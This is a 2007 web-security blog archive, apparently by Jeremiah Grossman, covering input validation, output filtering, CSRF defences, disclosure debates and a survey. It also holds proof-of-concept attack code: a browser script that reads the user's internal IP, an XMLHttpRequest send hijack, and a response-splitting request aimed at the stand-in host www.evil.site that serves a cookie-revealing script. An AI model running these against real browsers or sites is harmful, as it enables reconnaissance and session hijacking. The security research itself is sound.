Wednesday, January 31, 2007

Goodbye Applet, Hello NAT'ed IP Address

To perform some Intranet Hacking we need the web browser's internal NAT'ed IP address (i.e. 192.168.xxx.xxx). While not the most elegant solution, Java Applets (MyAddress) have been the only real way to go. It turns out JavaScript can invoke Java classes directly (in Firefox), including java.net.Socket, and can achieve the same results. No Applet required, which makes the proof-of-concept code a lot easier.

Firefox Only! (1.5 – 2.0) Tested on OS X and WinXP. Please let me know if anyone knows a way to invoke Java classes from JavaScript in Internet Explorer.

function natIP() {
    // Open a socket back to the host serving this page, then read the
    // local (internal) address the browser used for the connection.
    var w = window.location;
    var host = w.hostname; // hostname only; w.host may include a ":port" suffix
    var port = w.port || 80;
    var sock = new java.net.Socket(host, port);
    return sock.getLocalAddress().getHostAddress();
}



I hot-wired a version into this oversized form button

Tuesday, January 30, 2007

The difference between Security Assessments and Penetration Tests

Update 02/02/2007: Mike Rothman (Pragmatic CSO) posted a simple way to explain the difference and also provides further insight: "Assessments give you an idea about all the POTENTIAL holes. Pen tests prove whether the holes are in fact actionable."

Security Assessments and Penetration Tests are infosec industry terms commonly and erroneously used interchangeably. This causes confusion for business owners who are trying to figure out what solution they need to protect their Web businesses. For starters, security assessments are thorough evaluations of a website to validate security posture and/or detect ALL the possible weaknesses. Penetration tests simulate a controlled (internal/external) bad-guy website break-in with the goal of achieving a certain level of system/data access. Both methods are acceptable and add a lot of benefit if implemented properly and at the right time.

Security Assessments
There are a number of methodologies for performing website security assessments, including black box vulnerability assessments, source code reviews, threat modeling, configuration audits, etc., and some engagements may use combinations. Security assessments are invaluable for understanding what you own and the current security posture. This information is helpful in making educated decisions and applying the appropriate resources that'll make the most meaningful impact.

Penetration Tests
A pen-test team’s job is to break into a website, using whatever parameters they’ve been given, and gain access to the designated data they shouldn’t be able to obtain. They’ll exploit whatever vulnerabilities they need, but they’re NOT responsible for finding all the issues. The benefit is understanding how resilient your website is to determined attackers. At the end you should have interesting results and purpose built exploit code examples that tell a compelling story.

Expectations
The trick to choosing between the two is really understanding your business needs, requirements, and the value of what you're protecting. If there is any resource to help you do that, it's Pragmatic CSO. For those new to web application security, assessments are the way to go. Statistically most websites are known to be insecure, so a pen-test isn't going to be of much value at the start and you'd be better served by something more comprehensive. The second trick is properly setting the scope between you and the vendor, which may include IP ranges, hostnames, level of testing depth, time frame, frequency, costs, reporting, solutions, re-testing, etc.

Evolution
The rate of web application code change remains unrelenting and still only a relatively small percentage of websites are in fact professionally tested for security. As anyone can imagine this drastically increases the likelihood of security vulnerabilities and eventually leads to compromise. Good news for criminals, bad news for customers and website owners. Thankfully there's been a marked improvement in widely disseminated knowledge and a larger awareness of web application security issues. Web application security is no longer a dark and mysterious art known only to a select few insiders. Novices, with no more skill than their web browser, now easily master powerful tricks-of-the-trade from readily available books and whitepapers.

Two things that stand out in my mind:

1) Security assessment methodology has grown from a few thousand unique tests to tens of thousands on the average website.
2) The technical skills required to perform a good security assessment have actually increased rather than diminished!


Conclusion: Experience Counts
To comprehensively assess the security of a website, a tester must be adept at the 24 known classes of attack (WASC Threat Classification). Additionally, they need to be comfortable applying potentially hundreds of attack combinations described in scattered books and research papers. This type of expertise is developed over time, while being exposed to hundreds of assessments and practicing exploiting real-world websites. You want someone who understands your business and provides value in those terms.

Qualified security testers need the necessary skills to recommend appropriate solutions in a variety of given situations. Every website's security requirements are different and the particular circumstances must be taken into consideration. Identical vulnerabilities may be resolved in any number of acceptable ways. The tester's job is to find the right combination of solutions to effectively mitigate risk. Otherwise you may end up with a time-consuming and expensive false sense of security.

The best testers are familiar with a few operating systems (Unix variants, Windows), several programming languages (Java, C, Perl, ASP, PHP, C#, HTML, JavaScript), a couple web servers (Apache/Microsoft IIS/iPlanet), some application servers (ASP.NET, J2EE, ColdFusion, WebSphere, etc.), and a handful of databases (MySQL, Oracle, Access, SQLServer). In web application security, experience counts and it’s become essential to work in teams.

Input validation or output filtering, which is better?

This question is asked regularly with respect to solutions for Cross-Site Scripting (XSS). The answer is that input validation and output filtering are two different approaches that solve two different sets of problems, including XSS. Both methods should be used whenever possible. However, this answer deserves further explanation.

Input Validation
(aka: sanity checking, input filtering, white listing, etc.)
Input validation is one of those things ranted about incessantly in web application security, and for good reason. If input validation was done properly and religiously throughout all web application code we'd wipe out a huge percentage of vulnerabilities, XSS and SQL Injection included. I'm also a believer that developers shouldn't have to be experts in all the crazy attacks potentially thrown at a website. There's simply too much to learn and their primary job should be writing new code, not becoming web application hackers. Developers should only have to concern themselves with the solutions required to mitigate any attack, no matter what it might be. This is where input validation comes into play.

Input validation should be performed on any incoming data that is not heavily controlled and trusted. This includes user-supplied data (query data, post data, cookies, referrers, etc.), data in YOUR database, data from a third-party (web service), or elsewhere. Here are the steps that should be performed before any incoming data is used:

Normalize
URL/UTF-7/Unicode/US-ASCII/etc. decode the incoming data (a minimal decoding sketch follows these steps).

Character-set checking
Ensure the data only contains characters you expect to receive. The more restrictive the rules are the better.

Length restrictions (min/max)
Ensure the data falls within a restricted minimum and maximum number of bytes. This limits the window of opportunity for an attack, as exploits tend to require lengthy input strings.

Data format
Ensure the structure of the data is consistent with what is expected. Phone numbers should look like phone numbers, email addresses should look like email addresses, etc.
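
As for the Normalize step above, here is a minimal decoding sketch (my illustration, assuming plain URL-encoded form input; UTF-7 and other exotic encodings would need extra handling):

import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

public final class Normalize {

    /* Decode URL-encoded input once, before any character-set,
       length, or data-format checks are applied. */
    public static String urlDecode(String raw) {
        try {
            return URLDecoder.decode(raw, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new RuntimeException(e); // UTF-8 is always available
        }
    }
}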

Regular expression examples with iteratively more restrictive security:
(These are just samples, not recommended for production use)

Phone number:

/* 555-555-5555 */
String phone = req.getParameter("phone");

/* character-set check only */
String regex1 = "^([0-9-]+)$";

/* character-set with length restrictions */
String regex2 = "^([0-9-]{12})$";

/* with data format restrictions */
String regex3 = "^([0-9]{3})-([0-9]{3})-([0-9]{4})$";

if (phone.matches(regex3)) {

    /* data is ok, do stuff... */

}

Email Address:

/* user@somehostname.com */
String email = req.getParameter("email");

/* character-set check only */
String regex1 = "^([0-9a-zA-Z@.-]+)$";

/* character-set with length restrictions */
String regex2 = "^([0-9a-zA-Z@.-]{1,128})$";

/* with data format restrictions */
String regex3 = "^([0-9a-zA-Z.-]{1,64})@([0-9a-zA-Z.-]{1,64})\\.([a-zA-Z]{2,3})$";

if (email.matches(regex3)) {

    /* data is ok, do stuff... */

}


Implementation
For a variety of reasons input validation has proved time consuming, prone to mistakes, and easy to forget about. The best approach is defining all the expected application data-types (account IDs, email addresses, usernames, etc.), abstracting them into reusable objects, and making them easily available from inside the development framework. Input validation is then all handled behind the scenes; there is no need to parse URLs or remember to apply all the relevant business logic rules. The benefit to this approach is that security becomes consistent and predictable. Plus, developers are assisted in creating software at a faster rate. Security and business goals are in alignment, which is exactly the place you want to be.
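
As a rough sketch of that reusable data-type idea (hypothetical class and method names of my own, not from any particular framework), an email address could be wrapped in a small self-validating object that developers reuse instead of handling raw strings:

/* Hypothetical reusable data-type: the validation rules live in one place. */
public final class EmailAddress {

    private static final String FORMAT =
        "^([0-9a-zA-Z.-]{1,64})@([0-9a-zA-Z.-]{1,64})\\.([a-zA-Z]{2,3})$";

    private final String value;

    private EmailAddress(String value) {
        this.value = value;
    }

    /* Returns a validated EmailAddress or throws if the input is unacceptable. */
    public static EmailAddress parse(String raw) {
        if (raw == null || !raw.matches(FORMAT)) {
            throw new IllegalArgumentException("invalid email address");
        }
        return new EmailAddress(raw);
    }

    public String toString() {
        return value;
    }
}

A developer then writes EmailAddress email = EmailAddress.parse(req.getParameter("email")); and never touches the regex.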

For example, let's say you're in an object-oriented environment working with a product purchase process:

URL:
http://website/purchase.cgi

Post Data:
product=100&quantity=4&cc=4444333322221111&exp=01/08

// Check if the user is properly logged-in and their account is active
if (user.isActive) {

// make sure the product is available in the requested quantity

if (req.product.isAvailable) {

// calculate the total purchase price
var total = req.product.price * req.qty;

// make sure the credit card is valid for the purchase total
if (req.creditcard.isValid(total)) {

// initiate the transaction
processOrder(user, req.product, req.qty, total, req.creditcard);

} else {

// inform user that their credit card was not accepted with a consistent message and also log the error to a central database.
requestFailed(req.creditcard.error);

}

} else {

// inform user that the item is not available with a consistent message and also log the error to a central database.
requestFailed(req.product.error);

}

} else {

// inform user that they are not properly logged in with a consistent message and also log the error to a central database.
requestFailed(user.error);

}


Notice that in the example code there is no input validation, direct database calls, or implicit strings. Everything is handled behind the scenes by the objects and methods. This makes mistakes less likely to occur and is extremely helpful in preventing a wide variety of attacks including XSS, SQL Injection, and more.

Output Filtering
When you get right down to it, XSS happens on output, when the unfiltered data hits the user's (victim's) web browser. Plus, untrusted data may originate from a variety of locations, including your own database. As a developer you're never really certain whether someone else is doing their job, so potentially malicious data may already be sitting in the DB. Better to play it safe when printing to screen.

Control the output encoding
Don't let the web browser guess at a web page's content encoding. Browsers are known for making mistakes that could lead to strange XSS variants. There are two ways to set the encoding: the response header and meta tags. It's best to use both methods to make certain the browser gets it right.

Response Header:
Content-Type: text/html; charset=utf-8
or
Content-Type: text/html; charset=iso-8859-1

Meta Tags:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
or
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
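
As an illustration, in a Java servlet environment setting both might look something like this (a minimal sketch using the standard Servlet API; the surrounding class and method names are mine):

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class EncodingExample {

    public void render(HttpServletRequest req, HttpServletResponse res) throws IOException {
        // Declare the content type and character set in the response header...
        res.setContentType("text/html; charset=utf-8");

        PrintWriter out = res.getWriter();
        // ...and repeat it in a meta tag so the browser never has to guess.
        out.println("<html><head>");
        out.println("<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">");
        out.println("</head><body>Hello</body></html>");
    }
}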

Removing HTML/JavaScript
Many languages and frameworks have their own methods to convert special characters into their equivalent HTML entities, and it's probably best to use one of those. If not, here is a Perl regex snippet that can be used or ported. I welcome anyone to comment on libraries they like; I'm not familiar and up to date with all of them. As with input validation, it's best to abstract this layer and make it second nature for developers.

$data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;
or
$data =~ s/([^\w])/'&#'.ord($1).';'/sge;
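
For those not working in Perl, a rough Java port of the second (stricter) snippet could look like this (my sketch, assuming only letters, digits, and underscores should pass through unencoded):

public final class HtmlEncoder {

    /* Encode every non-word character ([^\w] in the Perl version) as a
       numeric HTML entity, e.g. '<' becomes "&#60;". */
    public static String encodeForHtml(String data) {
        StringBuilder out = new StringBuilder(data.length());
        for (int i = 0; i < data.length(); i++) {
            char c = data.charAt(i);
            if (Character.isLetterOrDigit(c) || c == '_') {
                out.append(c);
            } else {
                out.append("&#").append((int) c).append(';');
            }
        }
        return out.toString();
    }
}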

Wednesday, January 24, 2007

Picking Brains Interview

I recently did a Picking Brains With... Jeremiah Grossman interview with Ronald van den Heetkamp of Jungsonn Studios (who goes by the name Jungsonn). "Picking Brains With..." is a collection of interviews Jungsonn is starting to put together with various experts in the industry. He asks them a series of infosec-related questions, and zip zap, you're done. I thought it would be fun, so I figured, why not!

Interviewed for the StillSecure Podcast

This week I appeared on a Podcast (my first ever) with Alan Shimel and Mitchell Ashley of StillSecure, After All These Years. Let me tell you, these guys rock! Alan and Mitchell are a lot of fun, simply hilarious, and know what they're talking about too! Making it hard to believe these guys are honest-ta'goodness infosec experts. They asked for my thoughts on the web application security industry, specifically vulnerability assessment. I had a great time and hopefully I'll get to do it again in the future. In the meantime I might have to go back through their audio archive and see what they've done in the past.

Monday, January 22, 2007

RSnake, Microsoft, XSS... Oh my!

RSnake leaked the other day that he's been having a positive dialog with MS about browser security. He said MS seems genuinely interested in adding more anti-XSS features into IE7. All I got to say is WOW! FINALLY someone is listening. Thank you! Few people know the issues as well as he does. Here's the thing I worry about… if MS does a good job at helping users protect themselves against XSS, I might have to switch browsers and recommend people do the same. That's a lot of crow to eat. :) Hey Mozilla/Firefox developers, little help here!

Preventing CSRF when vulnerable to XSS

*The following code and concepts should be considered highly experimental and a work in progress. Not to be used on production websites.*

Web Worms (like Samy) targeting social networking websites (like MySpace) typically involve combining two attacks, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). An attacker posts JavaScript Malware (Web Worm) to their user profile web page because the website allows user-supplied HTML and the input filters didn't catch the offending code. When a logged-in user visits the infected profile web page their browser is hi-jacked (user XSS'ed) to "friend the attacker" and post a copy of the Web Worm code to their profile (user CSRF'ed), causing self-replication. There is no "Cross-Site" as part of the forged requests as CSRF implies, but that conversation is for another time.

As was the case for MySpace and many other websites, important features, such as posts to a user profile and friend'ing users, are protected from CSRF using session tokens embedded in URLs or HTML forms. Requests aren't valid without a token. To defeat the CSRF solution, Web Worms first request a third-party page (on the same domain) to get a valid token and use it as part of a forged request. Since the attack is on the same domain, access to session tokens can be easily achieved. This is why many people, including myself, have believed that CSRF solutions can be defeated when an XSS vulnerability exists on that domain. However, there may be something we can do.


Without using browser exploits, JavaScript only has a few ways to access HTML data from another page on the same domain (listed below). Generally speaking, if we can prevent JavaScript on an XSS'ed web page from reading session tokens from other pages, we might have something worth pursuing.

XMLHttpRequest
window.open
IFrame

If we can remove access to these APIs, we may be able to prevent, or at least make it harder for, JavaScript Malware to bypass CSRF security. Enter prototype hijacking. The following proof-of-concept code effectively does this when called first at the top of the web page.

The PoC code is Firefox ONLY! Should this method prove workable, we can port examples to other browsers, namely Internet Explorer.

1) XMLHttpRequest

The Samy Worm used this method. The following function overwrites the XMLHttpRequest constructor so it has no functionality of any kind.

function XMLHttpRequest() { }

By calling XHR after this point:

var req = new XMLHttpRequest();
req.open('GET', 'http://website/', true);

Results in the following error message:

Error: req.open is not a function

I've not been able to find a way to restore XHR's functionality.


2) window.open

A Web Worm could feasibly open a small but hidden new window and read the session token out of that. To prevent it, impose the following line:

window.__defineGetter__("open", function() { });

By calling window.open after this point:

window.open("http://website/",null,"");

Results in the following error message:

Error: window.open is not a function

Again, I have found no way to restore window.open.

3) IFrame

There are a couple of ways to create IFrames from JavaScript: createElement and document.write. Overwriting these is the same as in the previous examples.

document.__defineGetter__("write", function() { });
document.createElement = function () {}


There are a couple of things to note here:
  • For any mechanism I have missed, the constructor should similarly be able to be overwritten.
  • The model breaks down if the XSS'ed web page requires any of these constructors.
  • I have not yet explored if Flash, JScript, VBScript can be used as a substitute for JavaScript to retrieve session tokens.

Like I said, a work in progress, but fun none the less :)

Friday, January 19, 2007

Read the ingredients

Bill Pennington passed this along to me this morning.

Recording/Slides for Top 10 Web Hack of 2006

Webinar Slides [PDF] and WebEx Recording [Reg. Required] released. Thanks again to RSnake and Robert Auger for helping build the list.

Attacks always get better, never worse. 2006 was a significant year for website hacking. “Hack” is the term used loosely to describe some of the more creative, useful, and interesting techniques / discoveries / compromises.


In this Webcast, WhiteHat Security founder and CTO Jeremiah Grossman will look back on what was discovered. He's collected as many of the new 2006 web hacks as could be found and narrowed the list to the Top 10. With issues ranging from XSS to confusion over AJAX and JavaScript vulnerabilities, and more, it's sure to be an informative discussion.


* Reveal the top 10 attacks of 2006 by creativity and scope

* Predict what these attacks mean for website vulnerability management in 2007

* Present strategies to protect your corporate websites

Thursday, January 18, 2007

Low-Hanging Fruit, Non-Sense

Dr. Nick: "With my new diet, you can eat as much as you want, any time you want!"
Marge: "And you'll lose weight?"
Dr. Nick: "You might! It's a free country!"
Dr. Nick Riviera (The Simpsons)

A common approach to vulnerability assessment (VA) is going after the so-called "low-hanging fruit" (LHF). The idea is to remove the easy stuff, making break-ins more challenging, without investing a lot of work and expense. Nothing wrong with that, except eliminating the low-hanging fruit doesn't really do much for website security. In network security the LHF/VA strategy can help because that layer endures millions of automated and untargeted attacks using "well-known" vulnerabilities. Malicious attacks on websites are targeted, using one-off zero-day vulnerabilities, and carried out by real live adversaries.

Let's say a website has 20 Cross-Site Scripting (XSS) vulnerabilities, 18 of which are classifiable as LHF. Completing a LHF/VA process to eliminate these might take a week to a month or more depending on the website. By eliminating 90% of the total issues, how much longer might it take a bad guy to identify one of the two remaining XSS issues they need to hack the site? An hour? A few? A day? Perhaps a week if you're really lucky. A recent thread on sla.ckers.org offered a perfect illustration.

Someone said vulnerabilities in Neopets, a popular social network gaming site for virtual pets, were hard to come by. The first question was who cares about Neopets? The answer was that it has millions of players and currency with monetary value. Through my browser I could almost hear the keyboards as the members raced to be the first. A dozen posts and 24 hours later an XSS disclosure hit. I didn't bother confirming. sla.ckers.org has already generated over 1,000 similar disclosures, including several in MySpace, so it wouldn't be out of the ordinary. However, these are also not the guys we need to be worrying about.

The real bad guys are after the money. They have all day, all night, every day, weekends and holidays to target any website they want. In the above example, we were just talking about some silly gaming site. What if the target was something more compelling? Think the real bad guys will be so nice as to publish their results? They’d bang on a system 24x7 until they got what they wanted and happily be on their way. Reportedly the group that hacked T-Mobile and Paris Hilton’s cell spent more than a year targeting the system.

The point I'm trying to make is that if you're going to spend weeks and months finding and fixing vulnerabilities, make sure the end result protects you for more than a lucky week. Sure, going after LHF is better than nothing, but if you're a professional responsible for security, that's the last thing you want to tell your boss your VA strategy is based on. The strategy you want is comprehensiveness. Push the bad guys away for months, years, or hopefully forever.

Tuesday, January 16, 2007

Cross-Site Request Forgery (CSRF/XSRF) FAQ

The Cross-Site Request Forgery (CSRF/XSRF) FAQ has been released! Good stuff.

What is Cross Site Request Forgery?
"Cross Site Request Forgery (also known as
XSRF, CSRF, and Cross Site Reference Forgery) works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls (Example: http://site/stocks?buy=100&stock=ebay) allowing specific actions to be performed when requested. If a user is logged into the site and an attacker tricks their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. Typically you'll use Cross Site Scripting to embed an IMG tag or other HTML/JavaScript code to request a specific 'task url' which gets executed without the users knowledge. These sorts of attacks are fairly difficult to detect potentially leaving a user debating with the website/company as to whether or not the stocks bought the day before we initiated by the user after the price plummeted."

read more...

Thursday, January 11, 2007

WASC Meetup at RSA (San Francisco 2007)

If you're going to RSA and want to meet up with the webappsec crowd, here's your chance.

This year's RSA Conference is being held at the San Francisco Moscone Center (February 5 – 9), and as we have every year for the past couple of years, we've coordinated an informal WASC Meet-Up. Usually about 20 or so people in the web application security community show up to have some fun sharing drinks, appetizers, conversation, and a few laughs. It's a great opportunity to see people that we only otherwise communicate with virtually. Everyone is welcome, and please drop me a note if you plan on coming:

jeremiah__ a-t __ whitehatsec.com

Place:
Jillian's
(Walking distance from the conference)

101 4th Street, Suite 170
San Francisco, CA 94103
Phone: 415.369.6100

Time: Wed, Feb. 7 @ 12:30pm

Wednesday, January 10, 2007

Disclosure 2.0

Recently I've been discussing how vulnerability discovery is more important than disclosure, and also how website owners are going to have to deal with disclosure whether they like it or not. Scott Berinato (CSO) just posted The Chilling Effect, a very well-written article describing the current web security environment and where we're heading. Definitely worth the read, and RSnake has posted his comments.

From the experts:

Dr. Pascal Meunier (Professor, Purdue University)

“He ceased using disclosure as a teaching opportunity as well. Meunier wrote a five-point don't-ask-don't-tell plan he intended to give to cs390s students at the beginning of each semester. If they found a Web vulnerability, no matter how serious or threatening, Meunier wrote, he didn't want to hear about it.”


Rsnake (ha.ckers.org and sla.ckers.org)

“RSnake doesn't think responsible disclosure, even if it were somehow developed for Web vulnerabilities (and we've already seen how hard that will be, technically), can work.”


Jeremiah Grossman (CTO, WhiteHat Security)

"Logistically, there's no way to disclose this stuff to all the interested parties," Grossman says. "I used to think it was my moral professional duty to report every vulnerability, but it would take up my whole day."


Chris Wysopal (CTO, Veracode)

“… responsible disclosure guidelines, ones he helped develop, "don't apply at all with Web vulnerabilities."


Jennifer Granick (Stanford's Center for Internet and Society)

“Granick would like to see a rule established that states it's not illegal to report truthful information about a website vulnerability, when that information is gleaned from taking the steps necessary to find the vulnerability, in other words, benevolently exploiting it.”

Tuesday, January 09, 2007

Drawing a line in the "Scan"

Normally I don’t post shameless company promotions on my blog, but this one is different. I thought people might find it interesting to follow the results. Commercial web application scanner vendors (Cenzic, SPI Dynamics, Watchfire, etc.) and service providers like myself from WhiteHat Security go back and forth with claims about what scanning technology can and can’t find. I say scanning is only capable of testing for about half of the issues (technical vulns) – they claim they find logical flaws. Who’s right? It's time to find out.

Enterprises are incentivized to select the best solution to find exactly where the vulnerabilities are. That’s where the focus should be. We all loathe reading lame paid-for 4-star reviews and bogus magazine awards. It’s 2007, and I say it's time to let the results speak for themselves. The hard part about measuring results is you never really know the total number of vulnerabilities present in custom web applications, and demo sites are a poor baseline for measurement. The best results are gathered using real websites when solutions go head-to-head, but obviously you just can't go out and pen-test any website you feel like.

As it happens a large portion of our Sentinel customers, with some of the largest and most popular websites in the world, previously purchased commercial scanners. They said the scanners were complex, reported too many false positives, or that the assessments were faster to do by hand. *Survey results back this up.* It's not that the tools don't work; they're sophisticated, but ended up not being the right solution for the job. Unfortunately many others in a similar situation are hesitant to try something new for fear of throwing good money after bad. Worse still, their websites remain unprotected and head-to-head comparisons between competing solutions remain few and far between.

Our results are better, but I'm not here asking people to take my word for it. I have something else in mind. Here's the deal: if someone previously purchased a commercial scanner and ended up not using it, not liking it, or is curious about alternatives, they can receive up to a $30,000 credit towards an annual Sentinel subscription. Completely risk-free. They'll see our results first hand on their website for comparison against their current scanner reports. (Full details) The enterprise gets to decide what can and can't be scanned for. Win or lose or draw, good or bad or otherwise, we're all going to learn something.

Automated Scanner vs. The OWASP Top Ten

The challenges of automated web application vulnerability scanning are a subject of frequent debate. Most websites have vulnerabilities, a lot of them, and we need help finding them quickly and efficiently. The point of contention revolves around what scanners are able to find, or not. Let's clear something up: scanners don't suck (well, some do), but that's not the point I'm making. My business is actually reliant upon leveraging our own vulnerability scanning technology. What I'm describing is setting proper expectations of what scanners are currently capable of and how that affects the assessment process.

Download: Automated Scanner vs. The OWASP Top Ten [reg required]

"The OWASP Top Ten is a list of the most critical web application security flaws – a list also often used as a minimum standard for web application vulnerability assessment (VA) and compliance. There is an ongoing industry dialog about the possibility of identifying the OWASP Top Ten in a purely automated fashion (scanning). People frequently ask what can and can’t be found using either white box or black box scanners. This is important because a single missed vulnerability, or more accurately exploited vulnerability, can cause an organization significant financial harm. Proper expectations must be set when it comes to the various vulnerability assessment solutions."

Monday, January 08, 2007

Review of the Subverting Ajax white paper

Stefano Di Paola and Giorgio Fedon's paper and presentation owe their meteoric rise to fame to the disclosure of the "Universal XSS vulnerability in Adobe's Acrobat Reader Plugin". Ironically that was a very small part of the overall content. The content is highly advanced and assumes a lot of webappsec knowledge (XSS, JavaScript, CSRF, Splitting, and Smuggling); it's definitely not a read for beginners. Now, normally I refrain from "publicly reviewing" white papers. I either read or write them, but how could I ignore Thomas Ptacek's request for a "characteristically excellent post"? Flattery works every time. :) Here goes:

Separate from the Universal XSS, two main attacks are described: XSS Prototype Hijacking and Auto Injecting Cross Domain Scripting (AICS). Both attacks target websites using Ajax and assume the victim has already been XSS'ed, or, as I like to put it, infected with JavaScript Malware. The rest is about the payload that comes after that point and what a bad guy could do. And speaking of Ajax, I've already published my view on the subject, so here's what the authors have to say:

“Applications based upon Ajax are affected by the same problems of any other web application, but usually are more complex because of their asynchronous nature.”

Fair enough. Not sure I agree, but it's not a vital topic for our purposes here. Let's move on.

XSS Prototype Hijacking
To leverage the example from the paper: The victim has been XSS’ed during a visit to a web bank that uses Ajax (XMLHttpRequest) for funds transfer. The JavaScript Malware overwrites the XMLHttpRequest object, which allows the attacker to transparently intercept and modify HTTP request/responses to the website. Sort of like an active sniffer in the browser DOM. The attacker could then initiate fraudulent transfers without the user’s knowledge. Interesting idea.

XMLHttpRequest.prototype.send = function (pay) {

// Hijacked .send
sniff("Hijacked: "+" "+pay);
pay=HijackRequest(pay);
return this.xml.send(pay);
}

Aside from not having seen any web bank using Ajax, the attack still could be plausible for other situations. The question I had is why would an attacker need to do this? Wouldn’t it be simpler to phish them with a login/password DOM overlay (Phishing with Superbait) or something else similar? Then I read this and thought a little differently:

“In this case, the attack is totally independent from any authentication system used such as One Time Passwords or RSA tokens.”


That's a good point. Sometimes stealing credentials is useless and the attacker might need to modify the request/response data in real-time. It really depends on what they're trying to achieve and on what site. While the act of overwriting JavaScript objects is not exactly new (my Gmail contact list hack was based on this technique), what these guys did was take it to the next level. This is one more technique that could come in handy down the road.

Auto Injecting Cross Domain Scripting (AICS)
“…an attacker could get total control over a website (which has a XSS vulnerability in it) by simply controlling an inner frame. If a browser is vulnerable to HRS this technique could be applied in a cross domain context every time a user opens a new page or exits from the browser, by injecting a new HRS. So even if a website in not vulnerable to XSS, it could be controlled.”

That's quite a claim! The attack has two more requirements beyond XSS. The victim must be using a forward proxy and a browser vulnerable to HTTP Response Splitting/Smuggling. I don't know how common this scenario is, but let's go with it anyway. If you recall Anton Rager's XSS Proxy, and my version based off that design, you'll remember we achieved persistent control over a victim's browser by using an invisible full-screen iframe. Whenever the victim clicked on the website, it was within the iframe, and we could monitor their activity. The limiting factor was that if the victim traveled to another domain the thread of control was lost due to the same-origin policy.

Stefano and Giorgio said you could overcome the limitation by priming the browser with a Splitting attack initiated by XMLHttpRequest.

var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("GET\thttp://www.evil.site/2.html\tHTTP/1.1\r\nHost:\t www.evil.site\r\nProxy-Connection:\tKeep- Alive\r\n\r\nGET","/3.html",false);x.send();


A JavaScript request forged as in the previous code will send the following requests:

GET http://www.evil.site/2.html HTTP/1.1
Host: www.evil.site
Proxy-Connection:Keep-Alive
GET /3.html HTTP/1.1
Host: www.evil.site
Proxy-Connection:Keep-Alive

If the Splitting attack was successful, the victim's proxy will see two requests and subsequently send back two responses, the second one laced with JavaScript Malware from the evil website:

Response 1: http://www.evil.site/2.html:
<html><body>foo</body></html>

Response 2: http://www.evil.site/3.html:
<html>
<head>
<meta http-equiv="Expires" content="Wed, 01 Jan 2020 00:00:00 GMT">
<meta http-equiv="Cache-Control" content="public">
<meta http-equiv="Last-Modified" content="Fri, 01 Jan 2010 00:00:00 GMT">
</head>
<body>
<script>
alert("DEFACEMENT and XSS: your cookie is " + document.cookie)
</script>
</body>
</html>

Here's where the magic happens. From the (vulnerable) browser's perspective only one request has been sent, so the second response is queued up waiting. If the victim were to then visit http://webbank.com/, they'd be served the second response and not the page from the real website. Ouch! Going back to the XSS Proxy limitation from the beginning: before the victim clicks to go off-domain, a Splitting request is primed and waiting to serve up more JavaScript Malware from the evil website. And like the description said, the next website doesn't necessarily need to be vulnerable to XSS. Clever!

Honestly I don’t know if this attack works, or how well, though I assume it does if you have the properly vulnerable set of software. I don’t see a reason why it wouldn’t.

Conclusion
Stefano and Giorgio deserve a lot of credit for their discoveries and I hope they keep at it. Personally I find this kind of cutting-edge web attack research fascinating, no matter how (im)plausible it might end up being. The fact is you never know when someone else might see something you don't. For myself, it's one of the coolest things when others find ways to improve upon my past work. That's why I try to release as many little hacks as I can, no matter how strange.

At the end of the day this paper won't force us to do anything new on the web server: find and fix your cross-site scripting vulnerabilities. It does illustrate yet another reason why we need more browser security enhancements.




Web Application Security Professionals Survey (Jan. 2007)

Update 01/18/2007
The results are in and the people have spoken! Our goal was to capture the "thoughts" of the crowd and boy did it ever! The 59 respondents (4 fewer than Dec '06) shared their battleground views of web application security and in doing so presented interesting perspectives and great insights into a larger world. There is a huge amount of data inside and I couldn't be more pleased with the results. We also unexpectedly created a database of the most popular vulnerability assessment tools and knowledge resources. Thank you to everyone who took the time to submit.

My Observations
  1. Most already predicted 2007 as the year of XSS, CSRF, and Web Worms. The survey validates this message. (Q5) (Q13) (Q15) Virtually all those who are webappsec savvy say the vast majority of websites have serious security vulnerabilities (Q6), web browser security sucks (Q10), and believe most security professionals don't realize it or understand why (Q4). Clearly we have some challenges ahead.
  2. An uncanny number of people identically answered “My Brain” as their top tool for finding vulnerabilities (Q12). Unsurprisingly the open source proxies are among the most popular software in the webappsec arsenal. And we have some real characters in the crowd that’s for sure. (Q14)
  3. Half of the web application security community has a background in software development (me too) and the other half is IT/NetworkSec (Q3). This is an interesting pairing, as traditionally these two groups never really had cause to communicate with one another, let alone be forced to work together. Such is the state of web application security. This is probably an unpopular opinion, but software developers seem to have a hard time respecting any solution beyond the code, while IT/NetworkSec types understand the best results come from a collection of risk-mitigating solutions. We all should try to keep an open mind when new concepts and ideas arrive.
  4. There is a split in how people view the impact or involvement of Ajax technology on website security (Q8). Half say Ajax opens some new attack vectors; the other side says it increases the attack surface. I'm of the opinion the Ajax In-Security discussion has more to do with a semantic debate than a misunderstanding of the technology. This is fine when we speak amongst ourselves in the webappsec community, but it causes a lot of confusion for those outside the circle seeking education.
  5. People are cautiously optimistic about web application firewalls (Q9). Stopping attacks without having to fix the code certainly has its allure, to say nothing of the prospects of defense-in-depth. There are many out there, though, who've been soured by bad experiences with crappy and/or older WAFs.
  6. It's official: RSnake's blog is the most popular place among the webappsec crowd (Q11). *applause* He'll be making an appearance at the WASC meet-up during RSA to sign autographs. *grin*

Description
This monthly survey has become a really fun project. It's receiving great reviews, and right when you think you know something, the answers to a couple of questions reveal something unexpected. That's what we're really going for here: exposing various aspects of web application security we previously didn't know, understand, or fully appreciate. From the last survey, people said they really enjoyed the "thoughts" from the crowd in the bonus question. We'll try to capture more of those this time around.

As always, the more people who submit data, the better the information will be. Please feel free to forward this email along to anyone that might not have seen it.

Guidelines
  • Survey is open to anyone working in or around the web application security field
  • Answer the questions in-line and if a question doesn’t apply to you, leave it blank
  • Comments in relation to any question are welcome. If they are good, they may be published
  • Email results to jeremiah __at__ whitehatsec.com
  • To curb fake submissions please use your real name, preferably from your employers domain
